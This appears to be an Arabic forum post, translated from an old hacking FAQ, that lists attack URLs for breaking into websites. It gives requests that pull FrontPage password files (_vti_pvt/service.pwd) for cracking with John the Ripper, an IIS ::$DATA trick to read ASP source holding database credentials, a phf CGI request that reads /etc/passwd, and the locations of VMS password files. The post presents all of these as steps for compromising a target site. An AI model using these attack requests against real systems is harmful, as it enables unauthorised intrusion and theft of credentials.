ثغرات كل نظام

لقد قمت بتعريب الموضوع فقط لم فيه من الفائدة على الجميع وارجوا لكم الأستفادة :

النظام: اذا كان النظام يستخدم اوفيس فرونت بيج

الوظيفة: ضع الثغرة خلف العنوان مباشرة وعندك دخولك سوف تجد أسم المستخدم والباسورد مشفرة فقط قم بفك التشفير عن طريق جون ذا رباير

مثال: www.yourtarget.com/_vti_pvt/service.pwd
أو: www.yourtarget.com/_vti_pvt/author.pwd


النظام: اذا كان النظام يستخدم صفحات بامتداد .asp

الوظيفة: لدي مثال عن ثغرة ولكن ماذا تفعل عند دخولك الصفحة ؟ فقط قم باخراج مصدر الصفحة وستجد باسورد واسم المستخدم لقاعدة البيانات الخاصة بالموقع ويوجد ثغرة ستعقد انها تافه بعض الشيء ولكن يمكنك من خلاله اختراق المواقع وهي .


امثلة : www.whatever.com/default.asp.
أو: www.whatever.com/default.asp::dat

النظام: اذا كان الموقع يستخدم phf

الوظيفة: يمكنك الدخول من على الثغرة التي وضعتها بالمثال وسوف تجد ملف الشادو والباس وهذا يكفي لاختارقك الموقع

مثال: http://www.yourtarget.com/cgi-bin/p...t%20/etc/passwd


النظام: Vax أو Vms

الوظيفة: في ملف التشغيل

حاول بهذه: SYS$MANAGER:ANNOUNCE.TXT or SYS$Announce.txt


النظام: VMS

الوظيفة: سوف تجد الباسورد في

ألامر: sys$system:sysuaf.dat

نظرة علىalt 2600. إف أي كيو لبرنامجِ تخمينَ _ كلمة سر